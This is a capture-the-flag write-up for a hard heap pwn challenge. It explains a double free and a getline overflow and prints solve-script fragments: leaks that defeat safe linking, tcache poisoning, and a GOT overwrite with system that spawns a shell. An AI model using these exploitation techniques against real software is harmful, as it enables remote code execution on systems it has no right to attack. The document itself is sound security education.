`#`phantom-link

nc 0.cloud.chals.io 30126

Heap of trouble? More like a heap of fun! Dig through the chaos to uncover the flag.

author: LMS
category: pwn
points: 500ish
solves: idr
difficulty: hard

The challenge presents a typical heap note interface:

--- Menu ---
1. Add Data
2. Remove Data
3. Print Data
4. Exit
Please enter your choice:

binja decompile of add data

int64_t add_data()
    printf(format: "Enter size: ")
    uint64_t n
    __isoc99_scanf(format: "%d", &n)
    getchar()
    printf(format: "Enter data: ")
    int32_t idx = 0
    
    while (true)
        if (idx s> 9)
            return puts(str: "No more space to add data.")
        
        if (data_array[sx.q(idx)].size s<= 0)
            break
        
        idx += 1
    
    getline(lineptr: &data_array[sx.q(idx)], &n, stream: stdin)
    data_array[sx.q(idx)].size = n.d
    return printf(format: "Data added successfully to index…", zx.q(idx))

binja decompile of remove data

int64_t remove_data()
    printf(format: "Enter index of data to remove: ")
    int32_t idx
    __isoc99_scanf(format: "%d", &idx)
    
    if (idx s< 0 || idx s> 9 || data_array[sx.q(idx)].data == 0)
        return puts(str: "Invalid index or data not found.")
    
    free(mem: data_array[sx.q(idx)].data)
    data_array[sx.q(idx)].size = 0
    return puts(str: "Data removed successfully.")

binja decompile of print data

void print_data()
    for (int32_t i = 0; i s<= 9; i += 1)
        if (data_array[sx.q(i)].size != 0)
            printf(format: "Index %d: %s\n", zx.q(i), data_array[sx.q(i)].data)

Looking through the heap note functions, there are two vulnerabilities. The first is a double free in remove_data: it only checks that the data pointer is non-zero, not that the size is non-zero, and the pointer is never cleared after the free. The second has to do with how add_data reads the size of the input data. Inside add_data, n is declared as a 64-bit integer, but it is read with scanf("%d"), which only writes the lower 32 bits. The upper 32 bits of n keep whatever was on the stack at that location, and because getline treats *n as the capacity of the buffer, this effectively turns add_data into a pseudo gets.
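To make the size bug concrete, here is a small Python model of what scanf("%d") does to the 64-bit n. It is only a sketch: the little-endian layout matches x86-64, while the helper name `scanf_d_into_u64` and the stale stack value are made up for illustration.

```python
import struct

def scanf_d_into_u64(stale_qword: int, user_value: int) -> int:
    """Model scanf("%d", &n) when n is really a 64-bit slot (little-endian)."""
    slot = bytearray(struct.pack("<Q", stale_qword))  # whatever was on the stack
    slot[0:4] = struct.pack("<i", user_value)         # %d writes only 4 bytes
    return struct.unpack("<Q", bytes(slot))[0]

stale = 0x00007FFC12345678          # hypothetical leftover stack value
n = scanf_d_into_u64(stale, 0x10)   # the user asks for size 0x10
print(hex(n))                       # 0x7ffc00000010
```

The low half is the requested size, but as a 64-bit value n is enormous, which is what getline ends up seeing.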

`#`getline antics

man 3 getline

DESCRIPTION

getline() reads an entire line from stream, storing the address of the buffer containing the text into *lineptr. The buffer is null-terminated and includes the newline character, if one was found.

If *lineptr is set to NULL before the call, then getline() will allocate a buffer for storing the line. This buffer should be freed by the user program even if getline() failed.

Alternatively, before calling getline(), *lineptr can contain a pointer to a malloc(3)-allocated buffer *n bytes in size. If the buffer is not large enough to hold the line, getline() resizes it with realloc(3), updating *lineptr and *n as necessary.

In either case, on a successful call, *lineptr and *n will be updated to reflect the buffer address and allocated size respectively.

getdelim() works like getline(), except that a line delimiter other than newline can be specified as the delimiter argument. As with getline(), a delimiter character is not added if one was not present in the input before end of file was reached.

data_array is a 10-element array that is zero initialized, so on the first getline call for each index, getline allocates a buffer whose size depends on how much input is read. On later calls for the same index the buffer is never resized, because the uninitialized upper 32 bits of n make getline think the buffer is huge. This gives us an easy heap overflow (getline never resizes the buffer no matter how much input we send), but it also means that malloc can be called at most 10 times.
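The resize decision can be modeled in a few lines of Python. This is a deliberately simplified sketch of the check described in the man page (grow only when the line does not fit in *n), not glibc's actual implementation; the capacity, the stale n value, and the payload are all hypothetical.

```python
def getline_would_realloc(n: int, line: bytes) -> bool:
    """Simplified model: grow only if the line plus its NUL terminator exceeds *n."""
    return len(line) + 1 > n

real_capacity = 0x10               # hypothetical: what the chunk can really hold
claimed_n = 0x00007FFC00000010     # low 32 bits from scanf, high bits stale
payload = b"A" * 0x100 + b"\n"

honest = getline_would_realloc(real_capacity, payload)  # True: would realloc
fooled = getline_would_realloc(claimed_n, payload)      # False: writes in place
overflow = len(payload) + 1 - real_capacity             # bytes past the buffer
print(honest, fooled, hex(overflow))
```

With an honest n the buffer would be grown first. With the corrupted n the same payload is written straight past the end of the chunk.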

`#`heap leak (4/10 allocations)

The challenge is using libc 2.39 and the heap has safe linking, so our first step should be getting a heap leak to defeat safe linking.

solve.py

a = make(0x10, b"")         # data_array[0] = { .data = ptr, .size = 0x10 }
free(a)                     # data_array[0] = { .data = ptr, .size = 0x00 }
assert a == make(0x10, b"") # data_array[0] = { .data = ptr, .size = 0x10 }

b = make(0x10, b"")         # data_array[1] = { .data = ptr, .size = 0x10 }
d = make(0x3d0, b"")        # <-- setup for later
c = make(0x10, b"")         # <-- setup for later

free(c)                     # <-- setup for later
free(a)                     # data_array[0] = { .data = freed(ptr), .size = 0x00 }
                            # data_array[1] = { .data = freed(ptr), .size = 0x10 }

leak = u64(view()[1].ljust(8, b"\x00"))
log.info(f"{leak = :#x}")   # leak data_array[1] since size is non-zero

We can abuse remove_data together with the getline behavior discussed above to get two references to the same heap chunk. Freeing one reference while the other still has a non-zero size lets print_data leak the first qword of the freed chunk, which is its mangled tcache next pointer.
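For reference, this is what safe linking does to the qword we just leaked. The two functions mirror glibc's PROTECT_PTR and REVEAL_PTR macros. The heap base is a hypothetical value, and the two offsets are the ones used in the solve script.

```python
def protect_ptr(pos: int, ptr: int) -> int:
    """Mangle ptr before storing it at address pos (glibc PROTECT_PTR)."""
    return (pos >> 12) ^ ptr

def reveal_ptr(pos: int, mangled: int) -> int:
    """Undo the mangling; XOR with the same key is its own inverse."""
    return (pos >> 12) ^ mangled

heap_base = 0x55555555B000        # hypothetical, page aligned
addr = heap_base + 0x2A0          # freed chunk whose first qword we print
nxt = heap_base + 0xAB0           # chunk it links to in the tcache

stored = protect_ptr(addr, nxt)   # what print_data would show
print(hex(stored))
```

Without knowing addr >> 12, the stored value cannot be decoded directly, which is why the leak has to be solved for the heap base first.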

solve.py

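from z3 import BitVec, LShR, Solver

s = Solver() # im lazy so use z3
base = BitVec('base', 64)
addr = BitVec('addr', 64)
nxt = BitVec('nxt', 64)              # renamed from `next` to avoid shadowing the builtin
s.add(addr == base + 0x2a0)          # freed chunk whose first qword we leaked
s.add(nxt ^ LShR(addr, 12) == leak)  # safe linking; LShR is a logical shift (>> is arithmetic in z3)
s.add(nxt & 0xFFF == 0xab0)
s.add(nxt == base + 0xab0)           # chunk the leaked pointer links to

print(s.check())
heapbase = s.model()[base].as_long()
mangle = heapbase >> 12
log.info(f"{heapbase = :#x}")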

Here we cheat a tiny bit. Since we are given a Dockerfile, we can determine the exact offsets from the heap base of both the leaked chunk and the chunk it points to. This allows us to undo the pointer mangling and recover the heap base.
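The same recovery can be done without z3. The sketch below assumes, as in the solve script, that the pointed-to chunk sits at offset 0xab0 and that both chunks live in the first page of the heap, so the mangling key equals the pointer shifted right by 12. The function name and the test heap base are hypothetical.

```python
def recover_heap_base(leak: int, next_off: int = 0xAB0) -> int:
    """Invert leak = nxt ^ (nxt >> 12), then subtract the known chunk offset.

    Each round fixes 12 more bits from the top, so 6 rounds cover 64 bits.
    """
    x = leak
    for _ in range(6):
        x = leak ^ (x >> 12)
    return x - next_off

# Round trip with a hypothetical heap base.
true_base = 0x55555555B000
leak = (true_base + 0xAB0) ^ (true_base >> 12)
recovered = recover_heap_base(leak)
print(hex(recovered))
```

This works because the top 12 bits of the leak are untouched by the XOR, and each recovered group of 12 bits is the key for the next group down.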

`#`libc leak (6/10 allocations)

solve.py

assert a == make(0x10, p64((heapbase + 0x30 + 0x80 + 0x10) ^ mangle))
assert c == make(0x10, b"")

e = make(0x10, b"")
f = make(0x10, b"")

free(d)
free(c)
free(a)

assert a == make(0x10, p64((heapbase + 0x320) ^ mangle))
assert d == make(0x10, b"", lim=False)
assert c == make(0x10, b"")

g = make(0x10, b"")
h = make(0x10, b"")

leak = u64(view()[5].ljust(8, b"\x00"))
log.info(f"{leak = :#x}")
leak = leak ^ mangle
log.info(f"{leak = :#x}")
if args.GDB:
    guess = int(input("guess: "), 16)
else:
    guess = 5
leak = (leak & ~0xFFFF) | 0xd00 | (guess << 12)
libcbase = leak - 0x1d7d00
log.info(f"{leak = :#x}")
log.info(f"{libcbase = :#x}")

In this specific libc version, the lowest byte of the unsorted bin address is 0x00, which prevents leaking the raw unsorted bin address with a %s print. One easy way around this is to move the chunk from the unsorted bin into either a smallbin or a largebin, where the lowest byte is no longer 0x00. The issue with that strategy is that it takes too many allocations and does not leave enough for the final RCE step.

The other method (which took me a few days to realize during the competition) is to insert the chunk into the tcache and let the tcache's own pointer mangling destroy the null byte. The mangled unsorted bin address can then be printed and recovered with our heap leak. This also explains the challenge name, phantom-link: we need to mess with the tcache to create fake links to chunks.
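The effect of the null byte, and of XORing it away, can be shown with a simplified Python model of a %s print. Both addresses below are hypothetical, and the sketch ignores the extra low-bit fix-up that the solve script performs after the leak.

```python
import struct

def printed_by_percent_s(raw: bytes) -> bytes:
    """Model printf("%s"): output stops at the first NUL byte."""
    return raw.split(b"\x00", 1)[0]

unsorted_fd = 0x00007F1234BD7D00   # hypothetical address, lowest byte is 0x00
mangle = 0x55555555B               # hypothetical heap base >> 12

direct = printed_by_percent_s(struct.pack("<Q", unsorted_fd))
via_tcache = printed_by_percent_s(struct.pack("<Q", unsorted_fd ^ mangle))

# Pad the printed bytes back to 8 and undo the XOR with the known key.
recovered = int.from_bytes(via_tcache.ljust(8, b"\x00"), "little") ^ mangle
print(direct, via_tcache.hex(), hex(recovered))
```

Printed directly, the pointer yields nothing because the first byte in memory is the terminator. Once XORed with the key, the low byte is non-zero and all six meaningful bytes come out.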

`#`full rce (exactly 10/10 allocations)

solve.py

target = libcbase + 0x1d7000 + 0x70

free(c)
free(a)

assert a == make(0x10, p64(target ^ mangle))
assert c == make(0x10, b"")

i = make(0x10, b"sh\x00")
system = libcbase + libc.sym.system
log.info(f"{system = :#x}")
j = make(0x20, p64(0) + p64(system))

sendlineafter(b": ", 3)

p.interactive()

Popping a shell is done by overwriting a libc GOT entry so that system gets called while getline is reading input. I think I was overwriting the memchr GOT entry, but I do not really remember at this point and I'm too lazy to check.
